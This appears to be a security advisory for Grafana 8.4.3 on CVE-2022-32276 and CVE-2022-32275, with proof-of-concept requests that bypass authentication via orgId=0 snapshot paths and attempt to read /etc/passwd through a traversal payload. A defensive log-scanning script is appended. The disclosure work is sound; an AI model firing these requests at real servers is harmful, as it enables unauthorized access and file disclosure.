
grafana

grafana 8.4.3 (b7d2911ca), also works on 8.5.5 (tested for @TheFrenchGhosty)

First point - CVE-2022-32276

Unauthenticated and authenticated users can send a forged snapshot-query request using arbitrary key parameters and reach the system dashboard area past the login page.

  • Evaluated version: 8.4.3 (b7d2911ca)
  • On accessing the system, the user is directed to the system home page, as shown in Image 1.

Image 1: login form

It was verified that an unauthenticated user who knows the vulnerable directories can enter an arbitrary ID value, which grants unauthenticated access to the hosted system pages. Parameters used: /dashboard/snapshot/*?orgId=0 and /invite/:

Image 2: Unauthenticated access to snapshot list


Image 3: Unauthenticated access to the dashboard menu


Image 4: Unauthenticated access to the filter menu

Second point - CVE-2022-32275

  • Evaluated version: 8.4.3 (b7d2911ca)
  • Injection of parameters in the HTTP request.

The failure is not a path traversal but a session-control failure: when the traversal-style path is requested, the authentication system redirects to an internal system page that should only be accessible to authenticated users.


Image 5: login form

Viewing the request in Burp Suite:

Image 6: Intercepting the request by burpsuite

Change the request by adding /{{constructor.constructor'/.. /.. /.. /.. /.. /.. /.. /.. /etc/passwd?orgId=1 and URL-encode it:

/dashboard/snapshot/%7B%7Bconstructor.constructor'/.. /.. /.. /.. /.. /.. /.. /.. /etc/passwd?orgId=1 HTTP/1.1


Image 7: Request changed before submission to server


Image 8: Data returned from the tampered request

POC 2

Send the request to the Burp Suite Repeater and change the request to:

GET /dashboard/snapshot/%7B%7Bconstructor.constructor'/.. /.. /.. /.. /.. /.. /.. /.. /etc/passwd?orgId=1 HTTP/1.1
Host: <grafana_host>:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-BR,en;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache


Image 9: Changing the request in the repeater function.


Image 10: Unauthenticated access
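As an added defender-side example (not part of the original write-up), the function below scans Grafana-style request log lines for the two patterns this advisory describes: snapshot requests carrying orgId=0 from an unauthenticated caller, and snapshot keys that carry template or traversal characters instead of a plain token. The logfmt field names (userId, path, status) and the alphanumeric shape of snapshot keys are assumptions, and the sample log lines are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in a Grafana-style logfmt layout (field names are
# an assumption; real deployments vary). userId=0 marks an unauthenticated caller.
SAMPLE_LOG = """\
t=2022-06-01T10:00:00Z lvl=info msg="Request Completed" userId=0 orgId=1 method=GET path=/login status=200
t=2022-06-01T10:00:05Z lvl=info msg="Request Completed" userId=0 orgId=0 method=GET path=/dashboard/snapshot/abc123?orgId=0 status=200
t=2022-06-01T10:00:09Z lvl=info msg="Request Completed" userId=0 orgId=1 method=GET path=/dashboard/snapshot/%7B%7Bconstructor.constructor'/../../../../../../../../etc/passwd?orgId=1 status=200
t=2022-06-01T10:00:12Z lvl=info msg="Request Completed" userId=42 orgId=1 method=GET path=/dashboard/snapshot/abc123?orgId=1 status=200
"""

SNAPSHOT_PREFIX = "/dashboard/snapshot/"
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
# Assumption: a genuine snapshot key is a plain alphanumeric token, so braces,
# quotes, dots and slashes (template or traversal characters) never belong in it.
KEY_RE = re.compile(r"^[A-Za-z0-9]+$")


def parse_logfmt(line):
    """Split one logfmt line into a dict, dropping quotes around quoted values."""
    return {k: v.strip('"') for k, v in FIELD_RE.findall(line)}


def classify(line):
    """Return the reasons a line matches the advisory's patterns ([] if benign)."""
    fields = parse_logfmt(line)
    # Split before decoding so an encoded '?' inside the key is not mistaken for
    # the query string; decode only the key part afterwards (%7B%7B -> {{).
    url = urlsplit(fields.get("path", ""))
    if not url.path.startswith(SNAPSHOT_PREFIX):
        return []
    key = unquote(url.path[len(SNAPSHOT_PREFIX):])
    reasons = []
    if not KEY_RE.fullmatch(key):
        reasons.append("snapshot key is not a plain alphanumeric token")
    if fields.get("userId") == "0" and parse_qs(url.query).get("orgId") == ["0"]:
        reasons.append("unauthenticated snapshot request with orgId=0")
    if reasons and fields.get("userId") == "0" and fields.get("status") == "200":
        reasons.append("server answered 200 to an unauthenticated caller")
    return reasons


def scan(log_text):
    """Return [(line_number, reasons)] for every suspicious line."""
    return [(n, r) for n, l in enumerate(log_text.splitlines(), 1) if (r := classify(l))]


if __name__ == "__main__":
    for number, reasons in scan(SAMPLE_LOG):
        print(f"line {number}: {'; '.join(reasons)}")
```

Lines 2 and 3 of the sample are flagged; a logged-in user fetching a well-formed key (line 4) is not.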

References:

  • https://cwe.mitre.org/data/definitions/1345.html
  • https://cwe.mitre.org/data/definitions/284.html
  • https://cwe.mitre.org/data/definitions/552.html
  • https://cwe.mitre.org/data/definitions/548.html
  • https://cwe.mitre.org/data/definitions/706.html
  • https://owasp.org/www-pdf-archive/OWASP_SCP_v1.3_pt-BR.pdf

For information: the failure pointed out here generated issue grafana/grafana#53051, which the Grafana team completed and closed on 08/01/2022.